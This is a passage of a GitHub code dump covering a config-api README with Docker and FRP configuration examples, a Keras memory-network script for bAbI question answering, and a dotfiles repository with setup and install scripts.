-d \"true\"\n$ curl -H \"Content-Type: text/plain\" ${cursor_uri}/set/str?key=tlscacert -d \"/etc/certs/ca.pem\"\n$ curl -H \"Content-Type: text/plain\" ${cursor_uri}/set/str?key=tlscert -d \"/etc/certs/server-cert.pem\"\n$ curl -H \"Content-Type: text/plain\" ${cursor_uri}/set/str?key=tlskey -d \"/etc/certs/server-key.pem\"\n$ curl -H \"Content-Type: text/plain\" ${cursor_uri}/append/str?key=hosts -d \"tcp://0.0.0.0:2376\"\n$ curl -H \"Content-Type: text/plain\" ${cursor_uri}/append/str?key=hosts -d \"unix:///var/run/docker.sock\"\n\n ok\n\n$ #输出配置\n$ curl ${cursor_uri}/output/json\n\n {\n \"registry-mirrors\": [\n \"http://ef017c13.m.daocloud.io\"\n ],\n \"tlsverify\": true,\n \"tlscacert\": \"/etc/certs/ca.pem\",\n \"tlscert\": \"/etc/certs/server-cert.pem\",\n \"tlskey\": \"/etc/certs/server-key.pem\",\n \"hosts\": [\n \"tcp://0.0.0.0:2376\",\n \"unix:///var/run/docker.sock\"\n ]\n }\n\n```\n\n> 环境变量生成 INI 配置文件示例\n\n```\n$ export FRP_COMMON_SERVER_ADDR=0.0.0.0\n$ export FRP_COMMON_BIND_PORT=7000\n$ export FRP_SSH_TYPE=tcp\n$ export FRP_SSH_LOCAL_IP=127.0.0.1\n$ export FRP_SSH_LOCAL_PORT=22\n$ export FRP_SSH_REMOTE_PORT=6000\n\n$ data=$(env | grep FRP) && echo \"${data}\"\n\n FRP_COMMON_SERVER_ADDR=0.0.0.0\n FRP_COMMON_BIND_PORT=7000\n FRP_SSH_TYPE=tcp\n FRP_SSH_LOCAL_IP=127.0.0.1\n FRP_SSH_LOCAL_PORT=22\n FRP_SSH_REMOTE_PORT=6000\n\n$ query_args=\"prefix=FRP&delimiter=_§ion_lower=1&key_lower=1\"\n$ curl -H \"Content-Type: text/plain\" http://127.0.0.1:5000/env_to_ini?${query_args} -d \"${data}\"\n\n [common]\n server_addr = 0.0.0.0\n bind_port = 7000\n\n [ssh]\n local_ip = 127.0.0.1\n remote_port = 6000\n local_port = 22\n type = tcp\n\n```\n\n## 文档说明\n- [接口文档](Docs/Api.md)\n\n## TODO\n- 数据请求长度限制\n- 游标数据大小限制\n- 引入环境变量支持\n- 改善部署方式\n\n## 项目贡献\n本项目是一个开源项目,欢迎任何人为其开发和进步贡献力量。\n- 在使用过程中出现任何问题,请通过 [Issue](https://github.com/ztj1993/config-api/issues) 反馈\n- Bug 修复可以直接提交 Pull Request 到 develop 分支\n- 如果您有任何其他方面的问题,欢迎邮件至 [email protected] 交流\n"
}
] | 14 |
HimaniChanchal/QuestionAnsweringBasedSystem
|
https://github.com/HimaniChanchal/QuestionAnsweringBasedSystem
|
34f6829f28c791be66d23543881e769a0e38fde9
|
33655a461791231fb6775f8d6afde0cd83e9edb7
|
6420a291d72e2e24e1dd4c9cfaf1794d5abfe7fa
|
refs/heads/master
| 2019-07-08T04:17:14.148388 | 2017-04-17T11:52:59 | 2017-04-17T11:52:59 | 88,317,802 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.63907390832901,
"alphanum_fraction": 0.6512845158576965,
"avg_line_length": 39.02857208251953,
"blob_id": "8e005559c26cf5272547bc504a67c745d239ef3d",
"content_id": "9774c915d7b7920d0d4892ca36843a278376659d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12612,
"license_type": "no_license",
"max_line_length": 295,
"num_lines": 315,
"path": "/Code/test.py",
"repo_name": "HimaniChanchal/QuestionAnsweringBasedSystem",
"src_encoding": "UTF-8",
"text": "'''This Code will train Network on bAbi Dataset.\nPapers on which this code is based on are:\n- Jason Weston, Antoine Bordes, Sumit Chopra, Tomas Mikolov, Alexander M. Rush,\n \"Towards AI-Complete Question Answering: A Set of Prerequisite Toy Tasks\",\n http://arxiv.org/abs/1502.05698\n- Sainbayar Sukhbaatar, Arthur Szlam, Jason Weston, Rob Fergus,\n \"End-To-End Memory Networks\",\n http://arxiv.org/abs/1503.08895\nIt gains 98.6% accuracy on task 'single_supporting_fact_10k' at 700 epochs, using RELU as a activation function, and when we used Sigmoid as a Activation function we need more Epoch as compared to RELU i.e at Epoch 600 we got only 60% accuracy.\n\n'''\nfrom __future__ import print_function\nimport tarfile\nimport numpy as np\nimport re\nfrom keras.preprocessing.sequence import pad_sequences\nfrom functools import reduce\nfrom keras.models import Sequential, Model\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers import Input, Activation, Dense, Permute, Dropout, add, dot, concatenate\nfrom keras.layers import LSTM\nfrom keras.utils.data_utils import get_file\n\n\n'''\nThis function will parse the stories of the bAbi dataset, Only the sentences that support the answer are kept and rest are discared.\n\n'''\n\ndef pruning(Totalline, only_supporting=False):\n \n TotalDataSet = []\n StoryDataSet = []\n for line in Totalline:\n \n line = line.decode('utf-8').strip()\n \n \n nid, line = line.split(' ', 1) #Where is Daniel? garden 11 i.e All lines will come here. including question and answer\n #line.split(' ',1), split line on spaces, keep 1st element in nid and after space in line.\n\n nid = int(nid) #15 i.e line number\n if nid == 1: #only 1st line is kept in story dataset.\n StoryDataSet = []\n if '\\t' in line: #It willl take only Question line, because only question line will contain tab.\n \n q, a, supporting = line.split('\\t')\n #print('line' ,line) #line Where is John? \tbedroom\t8\n #print('question' ,q) #question Where is John? \n #print('answer' ,a) #answer bedroom\n #print('supporting' ,supporting) #supporting 8\n\n q = tokenize(q)\n #print('Question', q)#Question [u'Where', u'is', u'John', u'?']\n\n substory = None\n if only_supporting:\n # Only select the related substory\n supporting = map(int, supporting.split())\n substory = [StoryDataSet[i - 1] for i in supporting]\n else:\n # Provide all the substories\n substory = [x for x in StoryDataSet if x]\n TotalDataSet.append((substory, q, a))\n StoryDataSet.append('')\n else:\n Sentence = tokenize(line)\n #print('sentence' , Sentence) #sentence [u'Daniel', u'journeyed', u'to', u'the', u'garden', u'.']\n\n StoryDataSet.append(Sentence)#append each sentence in StoryDataSet.\n return TotalDataSet\n\n\n\n\n'''\nconvert stories , Questions , Answers in a vector form, AnswerArray will contain an array of size equal to the vocabulary size , initially we fill all entries of this array as Zero and then we will find place 1 at those indexes that contain answer index... i.e here DataArray array will contain\nStories i.e in vectorize form, QuestionArray will contain Questions, and About AnswerArray I explained Earlier....At the end of this function we have different arrays of Stories, Question, Answer that we will feed to neural Network. \n\n'''\ndef vectorize_stories(TotalDataSet, vocabularyId, story_maxlen, query_maxlen):\n DataArray = []\n QuestionArray = []\n AnswerArray = []\n for StoryDataSet, query, answer in TotalDataSet:\n \n dataarray = [vocabularyId[w] for w in StoryDataSet]\n \n queryarray = [VocabularyId[w] for w in query]\n # let's not forget that index 0 is reserved\n answerarray = np.zeros(len(VocabularyId) + 1)\n \n answerarray[VocabularyId[answer]] = 1\n \n\n DataArray.append(dataarray)\n QuestionArray.append(queryarray)\n AnswerArray.append(answerarray)\n # print('DataArray>>>' , DataArray)\n # print('QuestionArray>>>' ,QuestionArray)\n # print('AnswerArray>>>' , AnswerArray)\n \n \n return (pad_sequences(DataArray, maxlen=story_maxlength),\n pad_sequences(QuestionArray, maxlen=query_maxlength), np.array(AnswerArray))\n\n\n\n''' This function will return tokenize the sentence E.g. tokenize('Jaya went to the temple. Where does Jaya gone?')\n['Jaya' , 'went' , 'to' , 'the' , 'temple' , '.' ,'Where' , 'does' , 'Jaya' , 'gone' , '?' ]\n\n'''\n\n\ndef tokenize(Sentence):\n \n return [x.strip() for x in re.split('(\\W+)?', Sentence) if x.strip()] \n\n'''\nThis function will convert all the sentences of a given file into a single story , also stories longer than maximum length are pruned.\n'''\ndef get_stories(f, only_supporting=False, max_length=None):\n \n TotalDataSet = pruning(f.readlines(), only_supporting=only_supporting)\n \n flatten = lambda TotalDataSet: reduce(lambda x, y: x + y, TotalDataSet)\n TotalDataSet = [(flatten(StoryDataSet), q, answer) for StoryDataSet, q, answer in TotalDataSet if not max_length or len(flatten(StoryDataSet)) < max_length]\n return TotalDataSet\n\n\n\n'''\nDownload the babi Dataset and take the path where it is being stored and do rest work on it\n'''\ntry:\n path = get_file('babi-tasks-v1-2.tar.gz', origin='https://s3.amazonaws.com/text-datasets/babi_tasks_1-20_v1-2.tar.gz')\nexcept:\n print('Error downloading dataset, please download it manually:\\n'\n '$ wget http://www.thespermwhale.com/jaseweston/babi/tasks_1-20_v1-2.tar.gz\\n'\n '$ mv tasks_1-20_v1-2.tar.gz ~/.keras/datasets/babi-tasks-v1-2.tar.gz')\n raise\ntar = tarfile.open(path)\n\n\nchallenges = {\n # QA1 with 10,000 samples\n 'single_supporting_fact_10k': 'tasks_1-20_v1-2/en-10k/qa1_single-supporting-fact_{}.txt',\n # QA2 with 10,000 samples\n 'two_supporting_facts_10k': 'tasks_1-20_v1-2/en-10k/qa2_two-supporting-facts_{}.txt',\n}\nchallenge_type = 'single_supporting_fact_10k'\nchallenge = challenges[challenge_type]\n\nprint('Extracting stories for the challenge:', challenge_type)\ntrain_stories = get_stories(tar.extractfile(challenge.format('train')))\ntest_stories = get_stories(tar.extractfile(challenge.format('test')))\n\n\nvocabulary= set()\nfor StoryDataSet, q, answer in train_stories + test_stories:\n vocabulary |= set(StoryDataSet + q + [answer])\nvocabulary = sorted(vocabulary)\n\n\n# Reserve 0 for masking via pad_sequences\nvocabulary_size = len(vocabulary) + 1\nstory_maxlength = max(map(len, (x for x, _, _ in train_stories + test_stories)))\nquery_maxlength = max(map(len, (x for _, x, _ in train_stories + test_stories)))\n\n\n'''\nprint('---->>')\nprint('Vocabulary size>>>', vocabulary_size, 'unique words')\nprint('maximum length of storY>>>', story_maxlength, 'words')\nprint('maximum length of story>>>', query_maxlength, 'words')\nprint('Number of training stories>>>', len(train_stories))\nprint('Number of test stories>>>', len(test_stories))\nprint('total vocabulary>>>' , vocabulary)\nprint('<<---')\n\nprint(train_stories[0])\nprint('<<<----')\nprint('***************On Vectorizing Word Sequences*************')\n\n'''\n\nVocabularyId = dict((c, i + 1) for i, c in enumerate(vocabulary))\n# id for the words of story,id for the words of query, array Y contain a value of 1 at the position of answer index\ninputs_train, queries_train, answers_train = vectorize_stories(train_stories,\n VocabularyId,\n story_maxlength,\n query_maxlength)\n# id for the test story, id for the query, array Y contain a value 1 at the position index of answer\ninputs_test, queries_test, answers_test = vectorize_stories(test_stories,\n VocabularyId,\n story_maxlength,\n query_maxlength)\n\n\n'''\nprint('--->>>')\nprint('inputs: integer tensor of shape (samples, max_length)')\nprint('inputs_train shape--->>>', inputs_train.shape)\nprint('inputs_test shape--->>>', inputs_test.shape)\nprint('-')\nprint('queries: integer tensor of shape (samples, max_length)')\nprint('queries_train shape--->>>', queries_train.shape)\nprint('queries_test shape--->>>', queries_test.shape)\nprint('-')\nprint('answers: binary (1 or 0) tensor of shape (samples, vocabulary_size)')\nprint('answers_train shape:', answers_train.shape)\nprint('answers_test shape:', answers_test.shape)\nprint('<<<---')\nprint('*************************Compiling*************************')\n'''\n # Create Tensor Object That will be used in making Model and training on it.\ninput_sequence = Input((story_maxlength,))\nquestion = Input((query_maxlength,))\n\n\n# sequential encoder is used for encoding.\n# embed the input sequence into a sequence of vectors\ninput_encoder_m = Sequential()\ninput_encoder_m.add(Embedding(input_dim=vocabulary_size,\n output_dim=64))\ninput_encoder_m.add(Dropout(0.7))\n\n# output: (samples, story_maxlen, embedding_dim)\n\n# embed the input into a sequence of vectors of size query_maxlen\ninput_encoder_c = Sequential()\ninput_encoder_c.add(Embedding(input_dim=vocabulary_size,\n output_dim=query_maxlength))\ninput_encoder_c.add(Dropout(0.7))\n# output: (samples, story_maxlen, query_maxlen)\n\n# embed the question into a sequence of vectors\nquestion_encoder = Sequential()\nquestion_encoder.add(Embedding(input_dim=vocabulary_size,\n output_dim=64,\n input_length=query_maxlength))\nquestion_encoder.add(Dropout(0.7))\n# output: (samples, query_maxlen, embedding_dim)\n\n# encode input sequence and questions (which are indices)\n# to sequences of dense vectors\ninput_encoded_m = input_encoder_m(input_sequence)\ninput_encoded_c = input_encoder_c(input_sequence)\nquestion_encoded = question_encoder(question)\n\n\n# compute a 'match' between the first input vector sequence\n# and the question vector sequence\n# shape: `(samples, story_maxlen, query_maxlen)`\nmatch = dot([input_encoded_m, question_encoded], axes=(2, 2))\nmatch = Activation('sigmoid')(match)\n\n# add the match matrix with the second input vector sequence\nresponse = add([match, input_encoded_c]) # (samples, story_maxlen, query_maxlen)\nresponse = Permute((2, 1))(response) # (samples, query_maxlen, story_maxlen)\n\n# concatenate the match matrix with the question vector sequence\nanswer = concatenate([response, question_encoded])\n\n\n\n# we have chosen RNN for reduction.\nanswer = LSTM(32)(answer) # (samples, 32)\n\n# one regularization layer -- more would probably be needed.\nanswer = Dropout(0.3)(answer)\nanswer = Dense(vocabulary_size)(answer) # (samples, vocab_size)\n# we output a probability distribution over the vocabulary\nanswer = Activation('sigmoid')(answer)\n\n# build the final model\nmodel = Model([input_sequence, question], answer)\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n# train\nhistory = model.fit([inputs_train, queries_train], answers_train,\n batch_size=32,\n epochs=1500,\n \n validation_data=([inputs_test, queries_test], answers_test))\n\n\nprint(history.history.keys())\nimport matplotlib.pyplot as plt\n\n# summarize history for accuracy i.e draw accuracy Vs Epoch graph\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n#summarize history for Loss i.e draw Loss Vs Epoch graph\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n# import of json for saving model\nimport json\nRemodel = model.to_json() #saving model to Remodel\nwith open('QASYSTEM1500sigmoid.json', 'w') as outfile: #file named as QASYSTEM1500sigmoid.json for saving model\n json.dump(Remodel, outfile) #writing model to file\n\nmodel.save_weights('QASYSTEM1500sigmoid_weights.h5') #saving weights to file named as QASYSTEM1500sigmoid_weights.h5\n\n\n\n"
},
{
"alpha_fraction": 0.7278130054473877,
"alphanum_fraction": 0.7523771524429321,
"avg_line_length": 46.52830123901367,
"blob_id": "e017399a16f280b0627b7c948bf11a798a2d9f93",
"content_id": "83a469080a1b527022fa55f9f87f0d4ddb293a9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2524,
"license_type": "no_license",
"max_line_length": 317,
"num_lines": 53,
"path": "/README.md",
"repo_name": "HimaniChanchal/QuestionAnsweringBasedSystem",
"src_encoding": "UTF-8",
"text": "# QuestionAnsweringBasedSystem\nThis is an implementation Of Question Answering System on bAbi DataSet\nThis Code will train Network on bAbi Dataset.\nPapers on which this code is based on are:\n- Jason Weston, Antoine Bordes, Sumit Chopra, Tomas Mikolov, Alexander M. Rush,\n \"Towards AI-Complete Question Answering: A Set of Prerequisite Toy Tasks\",\n http://arxiv.org/abs/1502.05698\n- Sainbayar Sukhbaatar, Arthur Szlam, Jason Weston, Rob Fergus,\n \"End-To-End Memory Networks\",\n http://arxiv.org/abs/1503.08895\nIt gains 98.6% accuracy on task 'single_supporting_fact_10k' at 700 epochs, using RELU as a activation function, and when we used Sigmoid as a Activation function we need more Epoch as compared to RELU i.e at Epoch 600 we got only 60% accuracy,But at Epoch 1000 we get 93% accuracy\n\nNow the Methods that we used are:\n\nPruning--->>This function will parse the stories of the bAbi dataset, Only the sentences that support the answer are kept and rest are discared.\n\nvectorize_stories--->>convert stories , Questions , Answers in a vector form, AnswerArray will contain an array of size equal to the vocabulary size , initially we fill all entries of this array as Zero and then we will find place 1 at those indexes that contain answer index... i.e here DataArray array will contain\nStories i.e in vectorize form, QuestionArray will contain Questions, and About AnswerArray I explained Earlier....At the end of this function we have different arrays of Stories, Question, Answer that we will feed to neural Network. \n\ntokenize--->>This function will return tokenize the sentence E.g. tokenize('Jaya went to the temple. Where does Jaya gone?')\n['Jaya' , 'went' , 'to' , 'the' , 'temple' , '.' ,'Where' , 'does' , 'Jaya' , 'gone' , '?' ]\n\n\nget_stories--->>This function will convert all the sentences of a given file into a single story , also stories longer than maximum length are pruned.\n\nHow We Actually Implemeted this??\n\n1> Download the bAbi Dataset, from the given link in the code.\nSample bAbi DataSet>>\n\n1 John Went to the temple.\n2 Denial followed John.\n3 Enna finally went to kitchen.\n4 Where does John went? temple 1\n\nSo, 1 in the neighbourhood of temple indicate that which statment will support this answer.\n\n2> Tokenize the sentence using the utf format.\n\n\n3> prune the dataset.\n\n4> create the three arrays storyArray,QuestionArray,AnswerArray.\n\n5>Vectorize these arrays.\n\n6>Give these Arrays to the LSTM neural network.\n\n7>Training is done on 10000 data sample and validation on 1000dataset.\n\n8>Save the model.\n\n9>plot the graphs for Accuracy and Loss.\n\n\n\n\n\n"
}
] | 2 |
djangopython000/Remotrepo5
|
https://github.com/djangopython000/Remotrepo5
|
54693c8ae086c69778d29ca39ed9b172e7abf774
|
864d24f7b859844999384de291f75dfc9412d4c8
|
5fd9591f9afb64d36ea373637429d1aa43ae1c77
|
refs/heads/master
| 2020-07-15T21:59:43.620024 | 2019-09-01T09:46:22 | 2019-09-01T09:46:22 | 205,657,099 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7306272983551025,
"alphanum_fraction": 0.7453874349594116,
"avg_line_length": 21.58333396911621,
"blob_id": "e46ea0bd6c6e18d4e815bea5374d522f4aba86a4",
"content_id": "933fc449a9830d039f8c10b01ac9e844e330c46b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 271,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 12,
"path": "/date/timeapp/views.py",
"repo_name": "djangopython000/Remotrepo5",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http.response import HttpResponse\nimport datetime as dt\ndate1=dt.datetime.now()\n\n\ndef dateview(request):\n\n x=\"<h1>the current date and time is {}</h1>\".format(date1)\n return HttpResponse(x)\n\n# Create your views here.\n"
}
] | 1 |
gd50302n/CIS-101
|
https://github.com/gd50302n/CIS-101
|
fc6ab5e2564355343e2ae6ec51939c5ced7b7f2d
|
8646f389de8d681953fbcf9e12acde57cbf3ed24
|
5c8811fcfba0295b85c377ffd0a430dfdb742835
|
refs/heads/master
| 2020-09-15T11:43:38.755186 | 2019-11-22T15:48:11 | 2019-11-22T15:48:11 | 223,435,259 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5980629324913025,
"alphanum_fraction": 0.6101694703102112,
"avg_line_length": 21.94444465637207,
"blob_id": "b7b77d7d3fe963d9f692d2834bc384847edeab24",
"content_id": "b1a9b264636e477685fc3950d3e83ddd26d6da60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 413,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 18,
"path": "/thanksgiving.py",
"repo_name": "gd50302n/CIS-101",
"src_encoding": "UTF-8",
"text": "import random\n\na = 30\nb = int(input (\"How many people might show up?\"))\nc = random. randint (1,16)\n\nfood = [\"turkey\", \"Apple pie\",\"mashed patatoes\",\"Mac and Cheese\"]\n\ntotal = a + b + c\n\nprint (\"Welcome to my program for thanksgiving\")\n\nanswer = \"n\"\n\nwhile answer != \"y\":\n for item in food:\n print (\"we need \" + str (total) + \" \" + item)\n answer = input (\"Do you want to keep going? Type y to exit.\")\n"
}
] | 1 |
oliveratutexas/dotfiles
|
https://github.com/oliveratutexas/dotfiles
|
935c3c442a265a0c2d2b12f350646902cda20cb5
|
e618207c4dcd92d94c01829f52693a9a7f9ac843
|
58cc7489f0fa3f1860240da1e95e72a0b1462fd9
|
refs/heads/master
| 2018-03-23T20:44:28.401852 | 2017-03-23T21:39:37 | 2017-03-23T21:39:37 | 11,874,937 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.68373703956604,
"alphanum_fraction": 0.68373703956604,
"avg_line_length": 31.11111068725586,
"blob_id": "7e255abae201a5d589d897561ea1d9b1affec120",
"content_id": "64bde564ee9a9543a941b41b2d84b29686e47c34",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1445,
"license_type": "no_license",
"max_line_length": 166,
"num_lines": 45,
"path": "/make-symlinks.sh",
"repo_name": "oliveratutexas/dotfiles",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n############################\n# .make.sh\n# This script creates symlinks from the home directory to any desired dotfiles in ~/dotfiles\n############################\n\n########## Variables\n\ndir=~/dotfiles # dotfiles directory\nolddir=~/dotfiles_old # old dotfiles backup directory\nfiles=\"config SpaceVim spacemacs oh-my-zsh jrnl_config zshrc zsh gitconfig inputrc bashrc vimrc tmux.conf nvim nvimrc profile bash_profile bash_it ycm_extra_conf.py\" \n# private scrotwm.conf Xresources oh-my-zsh zshrc\" # list of files/folders to symlink in homedir\n\n##########\n\n# create dotfiles_old in homedir\necho -n \"Creating $olddir for backup of any existing dotfiles in ~ ...\"\nmkdir -p $olddir\necho \"done\"\n\n\n# change to the dotfiles directory\necho -n \"Changing to the $dir directory ...\"\ncd $dir\necho \"done\"\n\necho \"Don't forget to use the best and latest version of pandoc!\"\n\n#This is to make sure spacevim works for both vim and nvim\n# move any existing dotfiles in homedir to dotfiles_old directory, \n# then create symlinks from the homedir to any files in the \n# ~/dotfiles directory specified in $files\nfor file in $files; do\n echo \"Moving any existing dotfiles from ~ to $olddir\"\n mv ~/.$file ~/dotfiles_old/\n echo \"Creating symlink to $file in home directory.\"\n ln -s $dir/$file ~/.$file\ndone\n\n#Make accomodations for spacevim\nln -sf SpaceVim vim \nln -sf SpaceVim config/nvim \n\n\nchsh -s $(which zsh)\n"
},
{
"alpha_fraction": 0.5032154321670532,
"alphanum_fraction": 0.5080385804176331,
"avg_line_length": 26.622222900390625,
"blob_id": "067150126c0a1b58d88accd17a604dcb368e52e8",
"content_id": "fe54a0b5e2f58c2a0e2c9c7e489ed9d06fa6fe0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1244,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 45,
"path": "/card_cutter/flash_cards_tests.py",
"repo_name": "oliveratutexas/dotfiles",
"src_encoding": "UTF-8",
"text": "import unittest\nimport re\n\nkeyboard_keys = '\\w' + re.escape('!\"#$%&\\'()*+,\\-./:;<=>?@\\[]^_`{|}~')\nkeyboard_keys = '[' + keyboard_keys + ']'\n# keyboard_keys = '\\w!\\\"#$%&\\'\\(\\)\\*+,'\nflags = re.VERBOSE | re.MULTILINE\n\n\nclass RegexTests(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n self.keyboard_regex = re.compile(keyboard_keys)\n print('regex expression:')\n print(self.keyboard_regex.pattern)\n print()\n\n def test1(self):\n '''\n Just for reggo letters.\n '''\n for char in range(ord('a'), ord('z') + 1):\n srchStrng = '' + chr(char)\n results = self.keyboard_regex.findall('' + chr(char))\n self.assertTrue(results)\n self.assertEqual(results[0], srchStrng)\n\n def test2(self):\n '''\n All those hard keyboard characters are now finally not a thing.\n '''\n for c in '!\"#$%&\\'()*+,\\-./:;<=>?@\\[]^_`{|}~':\n # print('' + c)\n srchStrng = '' + chr(c)\n results = self.keyboard_regex.findall('' + chr(c))\n self.assertTrue(results)\n self.assertEqual(results[0], srchStrng)\n\n def test3(self):\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n\n"
},
{
"alpha_fraction": 0.790123462677002,
"alphanum_fraction": 0.8055555820465088,
"avg_line_length": 28.454545974731445,
"blob_id": "4a3d46288bca862de18bb04705422b36324d8532",
"content_id": "51455bdd9d5d2fc6d956c5c0ad1e1561b6358b03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 11,
"path": "/install_scripts/flux.sh",
"repo_name": "oliveratutexas/dotfiles",
"src_encoding": "UTF-8",
"text": "# Install dependencies\nsudo apt-get install git python-appindicator python-xdg python-pexpect python-gconf python-gtk2 python-glade2 libxxf86vm1\n\n# Download xflux-gui\ncd /tmp\ngit clone \"https://github.com/xflux-gui/xflux-gui.git\"\ncd xflux-gui\npython download-xflux.py\n\n# EITHER install globally\nsudo python setup.py install\n"
},
{
"alpha_fraction": 0.7941176295280457,
"alphanum_fraction": 0.7941176295280457,
"avg_line_length": 33,
"blob_id": "e31fa85aad6bc2e7f7eb2c7b60bee61fe11c8d35",
"content_id": "279960044b6dc7a3fdb9465d38706dba55e58efd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 3,
"path": "/install_scripts/spacemacs_react.sh",
"repo_name": "oliveratutexas/dotfiles",
"src_encoding": "UTF-8",
"text": "npm install -g tern\nnpm install -g eslint babel-eslint eslint-plugin-react\nnpm install -g js-beautify\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7850637435913086,
"avg_line_length": 31.294116973876953,
"blob_id": "5da0f5e2d7ba5df4929365112bc27c2a4ac49d0d",
"content_id": "072b39669692b6327f9be5ae985fbfa0cf33a30c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 549,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 17,
"path": "/install_scripts/docker.sh",
"repo_name": "oliveratutexas/dotfiles",
"src_encoding": "UTF-8",
"text": "sudo apt-get update\nsudo apt-get install apt-transport-https ca-certificates\nsudo apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D\n\necho \"deb https://apt.dockerproject.org/repo ubuntu-xenial main\" > /etc/apt/sources.list.d/docker.list\n\nsudo apt-get update\nsudo apt-get purge lxc-docker\napt-cache policy docker-engine\nsudo apt-get upgrade\nsudo apt-get update\nsudo apt-get install linux-image-extra-$(uname -r)\n\nsudo apt-get update\nsudo apt-get install docker-engine\nsudo service docker start\nsudo docker run hello-world\n"
},
{
"alpha_fraction": 0.5712965130805969,
"alphanum_fraction": 0.5768430829048157,
"avg_line_length": 28.630136489868164,
"blob_id": "3a4a0169460af4f1f6e84cab5a6aa0f93196db9d",
"content_id": "635bd7635b1e67e14c33acd20b100a782afe44a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4327,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 146,
"path": "/card_cutter/add_flash_cards.py",
"repo_name": "oliveratutexas/dotfiles",
"src_encoding": "UTF-8",
"text": "import re\nimport os\n# import requests\nimport pickle\nimport subprocess\nimport time\nimport random\nimport sys\n\n# from html2text import html2text\n# from html2text_overrides import escape_md_section_override\n\nimport csv\n# import datetime.datetime.now()\nfrom os import listdir\n\nold_cards = dict()\nBASE_URL = \"https://ankiweb.net/edit/\"\nFILE_DELIM = '|'\n\ndef remove_indention(blk_string):\n '''\n The minimum amount of spaces preceding a line over all the lines will be trimmed from every line.\n Skips lines that contain no characters other than spaces or tabs.\n Ex. If 2 spaces precede one line, and the rest have 4 preceding, then 2\n spaces will be trimmed from ALL the lines.\n\n TODO - beware of the case of mixed tabs and spaces. I think for that case I\n should count the tabs and spaces and remove the appropriate count of each accordingly.\n '''\n min_num = sys.maxint\n lines = blk_string.splitlines()\n\n for lin in lines:\n if(lin.isspace()):\n continue\n pos = 0\n cnt = 0\n\n while(True):\n if(lin[pos] == ' '):\n cnt += 1\n pos += 1\n else:\n break\n\n if(cnt < min_num):\n min_num = cnt\n\n for ind in range(len(lines)):\n if(lines[ind].isspace()):\n continue\n else:\n # print(\"before\\n\",lst[ind])\n lines[ind] = lines[ind][min_num:]\n # print(\"after\\n\",lst[ind])\n\n return ''.join(lines)\n\n\n# Yanked from utility.py in the anki extension for supplementary buttons.\ndef md_to_html(clean_md):\n \"\"\"\n Take a string `clean_md` and return a string where the Markdown syntax is\n converted to HTML.\n \"\"\"\n new_html = ''\n with open('temp.md', 'w') as tempMdFile:\n tempMdFile.write(clean_md)\n # with open('md.temp','r+') as outTempMdFile:\n\n # input('wait for pandoc')\n subprocess.call('pandoc -s temp.md -o temp.html'.split())\n # input('after pandoc')\n\n with open('temp.html', 'r+') as termHTML:\n new_html = termHTML.read()\n # termHTML.truncate()\n\n subprocess.call('rm -f temp.html'.split())\n\n return new_html\n\n\ndef add_cards():\n home_path = os.path.expanduser('~') + '/Google Drive/JRNL_FILES/'\n keyboard_keys = '\\w' + re.escape('!\"#$%&\\'()*+,\\-./:;<=>?@\\[]^_`{|}~\\'')\n my_whitespace = '\\ \\t'\n flags = re.VERBOSE | re.MULTILINE\n match_pattern = re.compile(r\"\"\"\n #The entire first term\n (\n #Must begin with a keyboard key.\n (?:(?:^[{keyb}]+[{whtspc}{keyb}]*$\\n)\n #followed by (maybe or maybe not, a newline)\n (?:\\n){{0,2}})+\n )\n #Match the indentended second term\n (\n # Begins with whitespace, then non-whitespace, then whatever until a\n # newline\n (?:^[{whtspc}]+[{keyb}]+[{keyb}{whtspc}]*$\\n)+\n )\n \"\"\".format(keyb=keyboard_keys, whtspc=my_whitespace), flags)\n print(match_pattern.pattern)\n allowed_files = [\"notes\"]\n allowed_files = [x + \".md\" for x in allowed_files]\n print(\"RUNNING\")\n allowed_files = [file for file in listdir(home_path) if file in allowed_files]\n for file_name in allowed_files:\n\n cards = set()\n term = []\n definition = []\n\n with open(home_path + file_name) as jrnl_file:\n jrnl_text = jrnl_file.read()\n group_iter = match_pattern.findall(jrnl_text)\n #removes indentation 